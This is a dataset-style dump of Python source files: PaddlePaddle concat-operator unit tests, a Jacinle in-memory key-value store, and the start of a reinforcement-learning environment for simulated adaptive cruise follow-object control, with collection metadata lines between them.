self.assertEqual((out1.numpy() == np_out1).all(), True)
self.assertEqual((out2.numpy() == np_out2).all(), True)
def test_eager(self):
with _test_eager_guard():
self.test_api()
self.test_fluid_api()
self.test_imperative()
def test_errors(self):
with program_guard(Program(), Program()):
# The item in input must be Variable.
x2 = fluid.create_lod_tensor(np.array([[-1]]), [[1]],
fluid.CPUPlace())
x3 = fluid.create_lod_tensor(np.array([[-1]]), [[1]],
fluid.CPUPlace())
self.assertRaises(TypeError, paddle.concat, [x2])
# The input dtype of concat_op must be float16, float32, float64, int32, int64.
x4 = paddle.fluid.data(shape=[4], dtype='uint8', name='x4')
x5 = paddle.fluid.data(shape=[4], dtype='uint8', name='x5')
self.assertRaises(TypeError, fluid.layers.concat, [x4, x5])
# The type of axis in concat_op should be int or Variable.
x6 = fluid.layers.data(shape=[4], dtype='float16', name='x6')
x7 = fluid.layers.data(shape=[4], dtype='float16', name='x7')
x8 = fluid.layers.data(shape=[4], dtype='float32', name='x8')
def test_axis_type():
paddle.concat([x6, x7], 3.2)
self.assertRaises(TypeError, test_axis_type)
def test_input_same_dtype():
paddle.concat([x7, x8])
self.assertRaises(TypeError, test_input_same_dtype)
class TestConcatAPIWithLoDTensorArray(unittest.TestCase):
"""
Test concat api when the input(x) is a LoDTensorArray.
"""
def setUp(self):
self.axis = 1
self.python = paddle.concat
self.iter_num = 3
self.input_shape = [2, 3]
self.x = np.random.random(self.input_shape).astype("float32")
self.place = fluid.CUDAPlace(0) \
if fluid.is_compiled_with_cuda() else fluid.CPUPlace()
def set_program(self, use_fluid_api):
paddle.enable_static()
if use_fluid_api:
self.program = fluid.Program()
with fluid.program_guard(self.program):
input = fluid.layers.assign(self.x)
tensor_array = fluid.layers.create_array(dtype='float32')
zero = fluid.layers.fill_constant(shape=[1],
value=0,
dtype="int64")
for i in range(self.iter_num):
fluid.layers.array_write(input, zero + i, tensor_array)
self.out_var = fluid.layers.concat(tensor_array, axis=self.axis)
else:
self.program = paddle.static.Program()
with paddle.static.program_guard(self.program):
input = paddle.assign(self.x)
tensor_array = fluid.layers.create_array(
dtype='float32'
) # Api create_array is not supported in paddle 2.0 yet.
zero = paddle.zeros(shape=[1], dtype="int64")
for i in range(self.iter_num):
# Api array_write is not supported in paddle 2.0 yet.
fluid.layers.array_write(input, zero + i, tensor_array)
self.out_var = paddle.concat(tensor_array, axis=self.axis)
def test_fluid_api(self):
self._run_static_mode(use_fluid_api=True)
def test_paddle_api(self):
self._run_static_mode(use_fluid_api=False)
def _run_static_mode(self, use_fluid_api):
self.set_program(use_fluid_api)
self.assertTrue(self.out_var.shape[self.axis] == -1)
exe = fluid.Executor(self.place)
res = exe.run(self.program, fetch_list=self.out_var)
self.assertTrue(
np.array_equal(
res[0], np.concatenate([self.x] * self.iter_num,
axis=self.axis)))
if __name__ == '__main__':
unittest.main()
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from paddle.fluid.tests.unittests.op_test import OpTest, skip_check_grad_ci, convert_float_to_uint16
import paddle.fluid as fluid
from paddle.fluid import compiler, Program, program_guard, core
from paddle.fluid.framework import _test_eager_guard
import paddle
class TestConcatOp(OpTest):
def setUp(self):
self.op_type = "concat"
self.python_api = paddle.concat
self.dtype = self.get_dtype()
self.init_test_data()
self.inputs = {'X': [('x0', self.x0), ('x1', self.x1), ('x2', self.x2)]}
self.attrs = {'axis': self.axis}
if self.axis < 0:
self.actual_axis = self.axis + len(self.x0.shape)
self.actual_axis = self.actual_axis if self.actual_axis > 0 else 0
else:
self.actual_axis = self.axis
self.outputs = {
'Out':
np.concatenate((self.x0, self.x1, self.x2), axis=self.actual_axis)
}
def get_dtype(self):
return "float64"
def test_check_output(self):
if self.dtype == np.uint16:
place = core.CUDAPlace(0)
self.check_output_with_place(place)
else:
self.check_output(check_eager=True)
def test_check_grad(self):
if self.dtype == np.uint16:
place = core.CUDAPlace(0)
self.check_grad_with_place(place, ['x0'], 'Out')
self.check_grad_with_place(place, ['x1'], 'Out')
self.check_grad_with_place(place, ['x2'], 'Out')
else:
self.check_grad(['x0'], 'Out', check_eager=True)
self.check_grad(['x1'], 'Out', check_eager=True)
self.check_grad(['x2'], 'Out', check_eager=True)
def init_test_data(self):
if self.dtype == np.uint16:
x0 = np.random.random((5, 1, 4, 5)).astype(np.float32)
self.x0 = convert_float_to_uint16(x0)
x1 = np.random.random((5, 2, 4, 5)).astype(np.float32)
self.x1 = convert_float_to_uint16(x1)
x2 = np.random.random((5, 3, 4, 5)).astype(np.float32)
self.x2 = convert_float_to_uint16(x2)
else:
self.x0 = np.random.random((5, 1, 4, 5)).astype(self.dtype)
self.x1 = np.random.random((5, 2, 4, 5)).astype(self.dtype)
self.x2 = np.random.random((5, 3, 4, 5)).astype(self.dtype)
self.axis = 1
class TestConcatOp2(TestConcatOp):
def init_test_data(self):
self.x0 = np.random.random((2, 3, 4, 5)).astype(self.dtype)
self.x1 = np.random.random((2, 3, 4, 5)).astype(self.dtype)
self.x2 = np.random.random((2, 3, 4, 5)).astype(self.dtype)
self.axis = 1
@skip_check_grad_ci(
reason="The function 'check_grad' for large inputs is too slow.")
class TestConcatOp3(TestConcatOp):
def init_test_data(self):
self.x0 = np.random.random((1, 256, 170, 256)).astype(self.dtype)
self.x1 = np.random.random((1, 128, 170, 256)).astype(self.dtype)
self.x2 = np.random.random((1, 128, 170, 256)).astype(self.dtype)
self.axis = 1
def test_check_grad(self):
pass
@skip_check_grad_ci(
reason=
"This test will meet fetch error when there is a null grad. The detailed information is in PR#17015."
)
class TestConcatOp4(TestConcatOp):
def init_test_data(self):
self.x0 = np.random.random((2, 3, 4, 5)).astype(self.dtype)
self.x1 = np.random.random((2, 3, 4, 5)).astype(self.dtype)
self.x2 = np.random.random((0, 3, 4, 5)).astype(self.dtype)
self.axis = 0
def test_check_grad(self):
pass
class TestConcatOp5(TestConcatOp):
def init_test_data(self):
self.x0 = np.random.random((5, 1, 4, 5)).astype(self.dtype)
self.x1 = np.random.random((5, 2, 4, 5)).astype(self.dtype)
self.x2 = np.random.random((5, 3, 4, 5)).astype(self.dtype)
self.axis = -3
class TestConcatOp6(TestConcatOp):
def setUp(self):
self.op_type = "concat"
self.dtype = self.get_dtype()
self.python_api = paddle.concat
self.init_test_data()
self.lod = [[20, 80]]
self.out_lod = [[20, 80, 20, 80, 20, 80]]
self.inputs = {
'X': [('x0', (self.x0, self.lod)), ('x1', (self.x1, self.lod)),
('x2', (self.x2, self.lod))]
}
self.attrs = {'axis': self.axis}
if self.axis < 0:
self.actual_axis = self.axis + len(self.x0.shape)
self.actual_axis = self.actual_axis if self.actual_axis > 0 else 0
else:
self.actual_axis = self.axis
out = np.concatenate((self.x0, self.x1, self.x2), axis=self.actual_axis)
self.outputs = {'Out': (out, self.out_lod)}
def test_check_output(self):
self.check_output(check_eager=True)
def test_check_grad(self):
self.check_grad(['x0'], 'Out', check_eager=True)
self.check_grad(['x1'], 'Out', check_eager=True)
self.check_grad(['x2'], 'Out', check_eager=True)
def init_test_data(self):
self.x0 = np.random.random([100]).astype(self.dtype)
self.x1 = np.random.random([100]).astype(self.dtype)
self.x2 = np.random.random([100]).astype(self.dtype)
self.axis = 0
def create_test_AxisTensor(parent):
class TestConcatAxisTensor(parent):
def setUp(self):
self.op_type = "concat"
self.python_api = paddle.concat
self.dtype = self.get_dtype()
self.init_test_data()
self.inputs = {
'X': [('x0', self.x0), ('x1', self.x1), ('x2', self.x2)],
'AxisTensor': np.array([self.axis]).astype("int32")
}
self.attrs = {}
if self.axis < 0:
self.actual_axis = self.axis + len(self.x0.shape)
self.actual_axis = self.actual_axis if self.actual_axis > 0 else 0
else:
self.actual_axis = self.axis
self.outputs = {
'Out':
np.concatenate((self.x0, self.x1, self.x2),
axis=self.actual_axis)
}
cls_name = "{0}_{1}".format(parent.__name__, "AxisTensor")
TestConcatAxisTensor.__name__ = cls_name
globals()[cls_name] = TestConcatAxisTensor
create_test_AxisTensor(TestConcatOp)
create_test_AxisTensor(TestConcatOp2)
create_test_AxisTensor(TestConcatOp3)
create_test_AxisTensor(TestConcatOp4)
create_test_AxisTensor(TestConcatOp5)
create_test_AxisTensor(TestConcatOp6)
#----------------Concat Fp16----------------
def create_test_fp16(parent):
class TestConcatFp16(parent):
def get_dtype(self):
return np.float16
cls_name = "{0}_{1}".format(parent.__name__, "Fp16")
TestConcatFp16.__name__ = cls_name
globals()[cls_name] = TestConcatFp16
create_test_fp16(TestConcatOp)
create_test_fp16(TestConcatOp2)
create_test_fp16(TestConcatOp3)
create_test_fp16(TestConcatOp4)
create_test_fp16(TestConcatOp5)
create_test_fp16(TestConcatOp6)
#----------------Concat Bf16----------------
def create_test_bf16(parent):
@unittest.skipIf(not paddle.is_compiled_with_cuda(),
"core is not compiled with CUDA")
class TestConcatBf16(parent):
def get_dtype(self):
return np.uint16
cls_name = "{0}_{1}".format(parent.__name__, "Bf16")
TestConcatBf16.__name__ = cls_name
globals()[cls_name] = TestConcatBf16
create_test_bf16(TestConcatOp)
class TestConcatOpError(unittest.TestCase):
def test_errors(self):
with program_guard(Program(), Program()):
# The input type of concat_op should be list.
x1 = fluid.layers.data(shape=[4], dtype='int32', name='x1')
fluid.layers.concat(x1)
# The item in input must be Variable.
x2 = fluid.create_lod_tensor(np.array([[-1]]), [[1]],
fluid.CPUPlace())
x3 = fluid.create_lod_tensor(np.array([[-1]]), [[1]],
fluid.CPUPlace())
self.assertRaises(TypeError, fluid.layers.concat, [x2])
# The input dtype of concat_op must be float16, float32, float64, int32, int64.
x4 = fluid.layers.data(shape=[4], dtype='uint8', name='x4')
x5 = fluid.layers.data(shape=[4], dtype='uint8', name='x5')
self.assertRaises(TypeError, fluid.layers.concat, [x4, x5])
x6 = fluid.layers.data(shape=[4], dtype='float16', name='x6')
x7 = fluid.layers.data(shape=[4], dtype='float16', name='x7')
x8 = fluid.layers.data(shape=[4], dtype='float32', name='x8')
fluid.layers.concat([x6, x7])
# The type of axis in concat_op should be int or Variable.
def test_axis_type():
fluid.layers.concat([x6, x7], 3.2)
self.assertRaises(TypeError, test_axis_type)
def test_input_same_dtype():
fluid.layers.concat([x7, x8])
self.assertRaises(TypeError, test_input_same_dtype)
class TestConcatAPI(unittest.TestCase):
def test_fluid_api(self):
paddle.enable_static()
x_1 = fluid.data(shape=[None, 1, 4, 5], dtype='int32', name='x_1')
fluid.layers.concat([x_1, x_1], 0)
input_2 = np.random.random([2, 1, 4, 5]).astype("int32")
input_3 = np.random.random([2, 2, 4, 5]).astype("int32")
x_2 = fluid.data(shape=[2, 1, 4, 5], dtype='int32', name='x_2')
x_3 = fluid.data(shape=[2, 2, 4, 5], dtype='int32', name='x_3')
positive_1_int32 = fluid.layers.fill_constant([1], "int32", 1)
positive_1_int64 = fluid.layers.fill_constant([1], "int64", 1)
out_1 = fluid.layers.concat(input=[x_2, x_3], axis=1)
out_2 = fluid.layers.concat(input=[x_2, x_3], axis=positive_1_int32)
out_3 = fluid.layers.concat(input=[x_2, x_3], axis=positive_1_int64)
exe = fluid.Executor(place=fluid.CPUPlace())
[res_1, res_2, res_3] = exe.run(fluid.default_main_program(),
feed={
"x_1": input_2,
"x_2": input_2,
"x_3": input_3
},
fetch_list=[out_1, out_2, out_3])
assert np.array_equal(res_1, np.concatenate((input_2, input_3), axis=1))
assert np.array_equal(res_2, np.concatenate((input_2, input_3), axis=1))
assert np.array_equal(res_3, np.concatenate((input_2, input_3), axis=1))
def test_api(self):
paddle.enable_static()
x_1 = paddle.fluid.data(shape=[None, 1, 4, 5],
dtype='int32',
name='x_1')
paddle.concat([x_1, x_1], 0)
input_2 = np.random.random([2, 1, 4, 5]).astype("int32")
input_3 = np.random.random([2, 2, 4, 5]).astype("int32")
x_2 = fluid.data(shape=[2, 1, 4, 5], dtype='int32', name='x_2')
x_3 = fluid.data(shape=[2, 2, 4, 5], dtype='int32', name='x_3')
positive_1_int32 = paddle.fluid.layers.fill_constant([1], "int32", 1)
positive_1_int64 = paddle.fluid.layers.fill_constant([1], "int64", 1)
negative_int64 = paddle.fluid.layers.fill_constant([1], "int64", -3)
out_1 = paddle.concat(x=[x_2, x_3], axis=1)
out_2 = paddle.concat(x=[x_2, x_3], axis=positive_1_int32)
out_3 = paddle.concat(x=[x_2, x_3], axis=positive_1_int64)
out_4 = paddle.concat(x=[x_2, x_3], axis=negative_int64)
exe = paddle.static.Executor(place=paddle.CPUPlace())
[res_1, res_2, res_3,
res_4] = exe.run(paddle.static.default_main_program(),
feed={
"x_1": input_2,
"x_2": input_2,
"x_3": input_3
},
fetch_list=[out_1, out_2, out_3, out_4])
assert np.array_equal(res_1, np.concatenate((input_2, input_3), axis=1))
assert np.array_equal(res_2, np.concatenate((input_2, input_3), axis=1))
assert np.array_equal(res_3, np.concatenate((input_2, input_3), axis=1))
assert np.array_equal(res_4, np.concatenate((input_2, input_3), axis=1))
def test_imperative(self):
in1 = np.array([[1, 2, 3], [4, 5, 6]])
in2 = np.array([[11, 12, 13], [14, 15, 16]])
in3 = np.array([[21, 22], [23, 24]])
paddle.disable_static()
x1 = paddle.to_tensor(in1)
x2 = paddle.to_tensor(in2)
x3 = paddle.to_tensor(in3)
out1 = fluid.layers.concat(input=[x1, x2, x3], axis=-1)
out2 = paddle.concat(x=[x1, x2], axis=0)
np_out1 = np.concatenate([in1, in2, in3], axis=-1)
np_out2 = np.concatenate([in1, in2], axis=0)
paddle.enable_static()
self.assertEqual((out1.numpy() == np_out1).all(), True)
self.assertEqual((out2.numpy() == np_out2).all(), True)
def test_eager(self):
with _test_eager_guard():
self.test_api()
self.test_fluid_api()
self.test_imperative()
def test_errors(self):
with program_guard(Program(), Program()):
# The item in input must be Variable.
x2 = fluid.create_lod_tensor(np.array([[-1]]), [[1]],
fluid.CPUPlace())
x3 = fluid.create_lod_tensor(np.array([[-1]]), [[1]],
fluid.CPUPlace())
self.assertRaises(TypeError, paddle.concat, [x2])
# The input dtype of concat_op must be float16, float32, float64, int32, int64.
x4 = paddle.fluid.data(shape=[4], dtype='uint8', name='x4')
x5 = paddle.fluid.data(shape=[4], dtype='uint8', name='x5')
self.assertRaises(TypeError, fluid.layers.concat, [x4, x5])
# The type of axis in concat_op should be int or Variable.
x6 = fluid.layers.data(shape=[4], dtype='float16', name='x6')
x7 = fluid.layers.data(shape=[4], dtype='float16', name='x7')
x8 = fluid.layers.data(shape=[4], dtype='float32', name='x8')
def test_axis_type():
paddle.concat([x6, x7], 3.2)
self.assertRaises(TypeError, test_axis_type)
def test_input_same_dtype():
paddle.concat([x7, x8])
self.assertRaises(TypeError, test_input_same_dtype)
class TestConcatAPIWithLoDTensorArray(unittest.TestCase):
"""
Test concat api when the input(x) is a LoDTensorArray.
"""
def setUp(self):
self.axis = 1
self.python = paddle.concat
self.iter_num = 3
self.input_shape = [2, 3]
self.x = np.random.random(self.input_shape).astype("float32")
self.place = fluid.CUDAPlace(0) \
if fluid.is_compiled_with_cuda() else fluid.CPUPlace()
def set_program(self, use_fluid_api):
paddle.enable_static()
if use_fluid_api:
self.program = fluid.Program()
with fluid.program_guard(self.program):
input = fluid.layers.assign(self.x)
tensor_array = fluid.layers.create_array(dtype='float32')
zero = fluid.layers.fill_constant(shape=[1],
value=0,
dtype="int64")
for i in range(self.iter_num):
fluid.layers.array_write(input, zero + i, tensor_array)
self.out_var = fluid.layers.concat(tensor_array, axis=self.axis)
else:
self.program = paddle.static.Program()
with paddle.static.program_guard(self.program):
input = paddle.assign(self.x)
tensor_array = fluid.layers.create_array(
dtype='float32'
) # Api create_array is not supported in paddle 2.0 yet.
zero = paddle.zeros(shape=[1], dtype="int64")
for i in range(self.iter_num):
# Api array_write is not supported in paddle 2.0 yet.
fluid.layers.array_write(input, zero + i, tensor_array)
self.out_var = paddle.concat(tensor_array, axis=self.axis)
def test_fluid_api(self):
self._run_static_mode(use_fluid_api=True)
def test_paddle_api(self):
self._run_static_mode(use_fluid_api=False)
def _run_static_mode(self, use_fluid_api):
self.set_program(use_fluid_api)
self.assertTrue(self.out_var.shape[self.axis] == -1)
exe = fluid.Executor(self.place)
res = exe.run(self.program, fetch_list=self.out_var)
self.assertTrue(
np.array_equal(
res[0], np.concatenate([self.x] * self.iter_num,
axis=self.axis)))
if __name__ == '__main__':
unittest.main()
|
en
| 0.744374
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #17015." #----------------Concat Fp16---------------- #----------------Concat Bf16---------------- # The input type of concat_op should be list. # The item in input must be Variable. # The input dtype of concat_op must be float16, float32, float64, int32, int64. # The type of axis in concat_op should be int or Variable. # The item in input must be Variable. # The input dtype of concat_op must be float16, float32, float64, int32, int64. # The type of axis in concat_op should be int or Variable. Test concat api when the input(x) is a LoDTensorArray. # Api create_array is not supported in paddle 2.0 yet. # Api array_write is not supported in paddle 2.0 yet.
| 2.103484
| 2
|
jacinle/storage/kv/mem.py
|
dapatil211/Jacinle
| 114
|
6627567
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# File : mem.py
# Author : <NAME>
# Email : <EMAIL>
# Date : 01/19/2018
#
# This file is part of Jacinle.
# Distributed under terms of the MIT license.
from .kv import KVStoreBase
class MemKVStore(KVStoreBase):
def __init__(self, readonly=False):
super().__init__(readonly=readonly)
self._store = dict()
def _has(self, key):
return key in self._store
def _get(self, key, default):
return self._store.get(key, default)
def _put(self, key, value, replace):
if not replace:
self._store.setdefault(key, value)
else:
self._store[key] = value
def _erase(self, key):
return self._store.pop(key)
def _keys(self):
return self._store.keys()
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# File : mem.py
# Author : <NAME>
# Email : <EMAIL>
# Date : 01/19/2018
#
# This file is part of Jacinle.
# Distributed under terms of the MIT license.
from .kv import KVStoreBase
class MemKVStore(KVStoreBase):
def __init__(self, readonly=False):
super().__init__(readonly=readonly)
self._store = dict()
def _has(self, key):
return key in self._store
def _get(self, key, default):
return self._store.get(key, default)
def _put(self, key, value, replace):
if not replace:
self._store.setdefault(key, value)
else:
self._store[key] = value
def _erase(self, key):
return self._store.pop(key)
def _keys(self):
return self._store.keys()
|
en
| 0.571194
|
#! /usr/bin/env python3 # -*- coding: utf-8 -*- # File : mem.py # Author : <NAME> # Email : <EMAIL> # Date : 01/19/2018 # # This file is part of Jacinle. # Distributed under terms of the MIT license.
| 2.367586
| 2
|
AccFocEnv/AccFocEnv.py
|
mbroso/constraintnet_foc
| 0
|
6627568
|
<filename>AccFocEnv/AccFocEnv.py
"""This module implements a simulated follow object control environment following OpenAI Gym interface.
"""
import math
import numpy as np
import gym
from gym import error, spaces
from gym.utils import seeding
import matplotlib.pyplot as plt
import time
from tqdm import tqdm
from pathlib import Path
from . import traffic_scenarios
from . import vehicle_longitudinal_model
from . import reward_functions
from . import acceleration_constraints
class AccFocEnv(gym.Env):
"""Custom environment for follow object control that follows OpenAI gym interface"""
metadata = {'render.modes': ['episode']}
def __init__(self, opts, plotter=None):
"""Initialize environment
Args:
opts: Namespace object with options.
plotter: Plotter object to enable plotting of each episode.
"""
self.opts = opts
# Environment parameters
self.dt = opts.env_dt
self.phys_dt = opts.sim_dt
# store plotter for plotting of episodes
self.plotter = plotter
# Configure timing
self.pyhs_steps_subsample = round(self.dt / self.phys_dt)
assert self.dt >= self.phys_dt and self.pyhs_steps_subsample == self.dt / self.phys_dt, \
"AccFocEnv: Intervals for train and pyhsics simulation don't match! env_dt has to be a multiple of sim_dt"
self._max_episode_steps = round(opts.env_stop_time / self.dt)
# Define action space. Define observation space.
self.action_space = spaces.Box(low=opts.vehicle_a_min, high=opts.vehicle_a_max, shape=(1,), dtype=np.float32)
self.observation_space = spaces.Box(-np.inf, np.inf, shape=(len(self.opts.observations),), dtype=np.float32)
# Create ego car object. Initial position and velocity will be set by traffic scenario.
self.ego_car = vehicle_longitudinal_model.my_vehicle_model(
opts=opts, dt=self.phys_dt
)
# Environment including lead car from choosen traffic scenario.
self.environment = traffic_scenarios.my_scenario(opts=opts, dt=self.phys_dt, ego_car=self.ego_car)
# Reward function specified by options.
self.reward_function = reward_functions.my_reward_function(opts=opts)
# Load specified costraints.
self.constraints = acceleration_constraints.AccelerationConstraints(self.opts)
def seed(self, seed=None):
"""Seeds the whole environment.
Args:
seed: Random seed.
Returns:
Random seed.
"""
self.np_random, seed = seeding.np_random(seed)
self.action_space.seed(seed)
self.environment.seed(seed)
return [seed]
def reset(self):
"""Resets environment, traffic scenario and variables
Returns:
Initial state.
"""
# Reset internal values and environment
self.environment.reset()
# self.ego_car.reset() => Resetting ego_car is handled by traffic_scenario
self.t = 0.0
self.steps = 0
self.last_a_dem = 0
self.last_a_ego = 0
self.last_Hw = -1
self.last_a_min = -0.1
self.last_a_max = 0.1
# Create buffer if it doesn't exist yet. In subsequent resets do nothing, values in buffer will be overwritten.
if not hasattr(self, "data_store"):
self.data_store = {}
return self.step([0])[0] # Return only state
def step(self, action):
"""Simulates one environment step
Args:
action: List of chosen action.
Returns:
OpenAI Gym compatible return: Dict containing (observations, reward, done, debug_infos)
"""
# Get desired acceleration and check system boundaries.
a_dem = action[0]
assert self.opts.vehicle_a_min <= a_dem <= self.opts.vehicle_a_max, f"Action {a_dem} m/s² not part of action space!"
# Clip a_dem according to constraints when specified in opts
if self.opts.clip_a_dem == True:
a_dem = np.clip(a_dem, self.last_a_min, self.last_a_max)
# Simulate next timesteps of environment and ego_car.
for i in range(self.pyhs_steps_subsample):
a_tar, v_tar, x_tar, scenario_done = self.environment.step(self.t + self.phys_dt * i)
a_ego, v_ego, x_ego = self.ego_car.step(a_dem)
# Calucate correction velocity to increase distance in Stop&Go scenario.
v_correction = 0
if v_ego < self.opts.stop_n_go_velocity:
v_correction = self.opts.stop_n_go_distance / self.opts.desired_headway * (self.opts.stop_n_go_velocity - v_ego) / self.opts.stop_n_go_velocity
# Calulate and clip headway and its derivation.
Hw = (x_tar - x_ego) / max(0.001, v_ego + v_correction)
dHw = (Hw - self.last_Hw) / self.dt
if self.last_Hw == -1:
dHw = 0 # Prevent inital value from being to big
self.last_Hw = Hw
Hw = max(0, min(10.01, Hw))
dHw = max(-0.75, min(0.75, dHw))
# Calculate safe distance. Increase distance for Stop&Go scenario.
safe_distance = self.opts.desired_headway * abs(v_ego)
if v_ego < self.opts.stop_n_go_velocity:
safe_distance += self.opts.stop_n_go_distance * (1 - max(0, v_ego) / self.opts.stop_n_go_velocity)
# All variables in this dict can be used as observation, in the reward function or can be plotted.
state = {
# Time and raw commanded acceleration by agent.
't': self.t,
'a_dem': a_dem,
# Ego vehicle.
'a_ego': a_ego,
'v_ego': v_ego,
'x_ego': x_ego,
'j_ego': (a_ego - self.last_a_ego) / self.dt,
# Target vehicle.
'a_tar': a_tar,
'v_tar': v_tar,
'x_tar': x_tar,
# Relative values.
'a_rel': a_tar - a_ego,
'v_rel': v_tar - v_ego,
'x_rel': x_tar - x_ego,
# Control setpoints.
'd_safe': safe_distance,
'd_err': safe_distance - (x_tar - x_ego),
'Hw': Hw,
'dHw': dHw,
'v_err': v_tar - v_ego,
# misc
'last_a_dem': self.last_a_dem,
'last_a_ego': self.last_a_ego,
}
# Calculation upper and lower constraint for acceleration and add to state.
state["a_min"], state["a_max"] = self.constraints.calculate(state)
# end episode of ego car crashed in the lead car or car goes backwards fast
# done signal
# done = 0: not done, episode can continue
# done = 1: done, because simulated time ended
# done = 2: done, because agent ended in terminal step (e.g. crash)
done = 1 if scenario_done or (self.steps >= self._max_episode_steps - 1) else 0
done = 2 if (x_tar - x_ego) < -50 or v_ego < -5 else done
state["done"] = done
# Calculate reward and add to state.
reward = self.reward_function(state, self.opts)
state["reward"] = reward
# Store state values in buffer for later plotting.
if self.steps < self._max_episode_steps:
# Store all state variables in data_store.
for k, v in state.items():
if k not in self.data_store:
self.data_store[k] = np.zeros(self._max_episode_steps)
self.data_store[k][self.steps] = v
# Add choosen action to previous timestep in state dict.
if self.steps >= 1:
self.data_store["a_dem"][self.steps - 1] = a_dem
# Extract observations from state dict.
obs = [state[key] for key in self.opts.observations]
# Increment counter and time. Store last values.
self.steps += 1
self.t += self.dt
self.last_a_dem = a_dem
self.last_a_ego = a_ego
self.last_a_min = state["a_min"]
self.last_a_max = state["a_max"]
# OpenAI Gym compatible return: (observations, reward, done, debug_infos)
return np.array(obs, dtype=np.float32), reward, done, {}
def render(self, mode='human', close=False):
"""Live rendering not supported. See render_episode()"""
pass
def render_episode(self, prefix=""):
"""Render a complete episode at its end using the plotter in a seperate thread.
"""
if self.plotter is None:
return
self.plotter.plot([self.data_store, self.steps, prefix])
def calc_metrics(self):
"""Calculate metrics at the end of an episode.
Returns:
Dict with keys:
safety: Metric for safety. Higher values are better. A value of 0 indicates a crash.
discomfort: Metric measuring discomfort. Lower values are better.
tracking_error: Metric measuring tracking error. Lower values are better.
"""
safety = min(1, np.min(self.data_store["Hw"][0:self.steps]) / self.opts.desired_headway)
discomfort = np.mean(self.data_store["a_ego"][0:self.steps]**2) + 0.5 * np.mean(self.data_store["j_ego"][0:self.steps]**2)
tracking_error = np.mean((self.data_store["Hw"][0:self.steps] - self.opts.desired_headway)**2)
tracking_error = min(9, tracking_error)
return {"safety": safety, "discomfort": discomfort, "tracking_error": tracking_error}
|
<filename>AccFocEnv/AccFocEnv.py
"""This module implements a simulated follow object control environment following OpenAI Gym interface.
"""
import math
import numpy as np
import gym
from gym import error, spaces
from gym.utils import seeding
import matplotlib.pyplot as plt
import time
from tqdm import tqdm
from pathlib import Path
from . import traffic_scenarios
from . import vehicle_longitudinal_model
from . import reward_functions
from . import acceleration_constraints
class AccFocEnv(gym.Env):
"""Custom environment for follow object control that follows OpenAI gym interface"""
metadata = {'render.modes': ['episode']}
def __init__(self, opts, plotter=None):
"""Initialize environment
Args:
opts: Namespace object with options.
plotter: Plotter object to enable plotting of each episode.
"""
self.opts = opts
# Environment parameters
self.dt = opts.env_dt
self.phys_dt = opts.sim_dt
# store plotter for plotting of episodes
self.plotter = plotter
# Configure timing
self.pyhs_steps_subsample = round(self.dt / self.phys_dt)
assert self.dt >= self.phys_dt and self.pyhs_steps_subsample == self.dt / self.phys_dt, \
"AccFocEnv: Intervals for train and pyhsics simulation don't match! env_dt has to be a multiple of sim_dt"
self._max_episode_steps = round(opts.env_stop_time / self.dt)
# Define action space. Define observation space.
self.action_space = spaces.Box(low=opts.vehicle_a_min, high=opts.vehicle_a_max, shape=(1,), dtype=np.float32)
self.observation_space = spaces.Box(-np.inf, np.inf, shape=(len(self.opts.observations),), dtype=np.float32)
# Create ego car object. Initial position and velocity will be set by traffic scenario.
self.ego_car = vehicle_longitudinal_model.my_vehicle_model(
opts=opts, dt=self.phys_dt
)
# Environment including lead car from choosen traffic scenario.
self.environment = traffic_scenarios.my_scenario(opts=opts, dt=self.phys_dt, ego_car=self.ego_car)
# Reward function specified by options.
self.reward_function = reward_functions.my_reward_function(opts=opts)
# Load specified costraints.
self.constraints = acceleration_constraints.AccelerationConstraints(self.opts)
def seed(self, seed=None):
"""Seeds the whole environment.
Args:
seed: Random seed.
Returns:
Random seed.
"""
self.np_random, seed = seeding.np_random(seed)
self.action_space.seed(seed)
self.environment.seed(seed)
return [seed]
def reset(self):
"""Resets environment, traffic scenario and variables
Returns:
Initial state.
"""
# Reset internal values and environment
self.environment.reset()
# self.ego_car.reset() => Resetting ego_car is handled by traffic_scenario
self.t = 0.0
self.steps = 0
self.last_a_dem = 0
self.last_a_ego = 0
self.last_Hw = -1
self.last_a_min = -0.1
self.last_a_max = 0.1
# Create buffer if it doesn't exist yet. In subsequent resets do nothing, values in buffer will be overwritten.
if not hasattr(self, "data_store"):
self.data_store = {}
return self.step([0])[0] # Return only state
def step(self, action):
"""Simulates one environment step
Args:
action: List of chosen action.
Returns:
OpenAI Gym compatible return: Dict containing (observations, reward, done, debug_infos)
"""
# Get desired acceleration and check system boundaries.
a_dem = action[0]
assert self.opts.vehicle_a_min <= a_dem <= self.opts.vehicle_a_max, f"Action {a_dem} m/s² not part of action space!"
# Clip a_dem according to constraints when specified in opts
if self.opts.clip_a_dem == True:
a_dem = np.clip(a_dem, self.last_a_min, self.last_a_max)
# Simulate next timesteps of environment and ego_car.
for i in range(self.pyhs_steps_subsample):
a_tar, v_tar, x_tar, scenario_done = self.environment.step(self.t + self.phys_dt * i)
a_ego, v_ego, x_ego = self.ego_car.step(a_dem)
# Calucate correction velocity to increase distance in Stop&Go scenario.
v_correction = 0
if v_ego < self.opts.stop_n_go_velocity:
v_correction = self.opts.stop_n_go_distance / self.opts.desired_headway * (self.opts.stop_n_go_velocity - v_ego) / self.opts.stop_n_go_velocity
# Calulate and clip headway and its derivation.
Hw = (x_tar - x_ego) / max(0.001, v_ego + v_correction)
dHw = (Hw - self.last_Hw) / self.dt
if self.last_Hw == -1:
dHw = 0 # Prevent inital value from being to big
self.last_Hw = Hw
Hw = max(0, min(10.01, Hw))
dHw = max(-0.75, min(0.75, dHw))
